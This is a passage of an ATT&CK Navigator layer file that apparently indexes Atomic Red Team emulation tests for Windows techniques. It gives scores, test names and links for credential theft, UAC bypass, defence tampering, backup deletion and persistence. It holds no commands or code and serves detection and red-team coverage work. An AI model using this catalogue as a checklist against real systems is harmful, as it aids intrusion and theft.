Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":57,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind 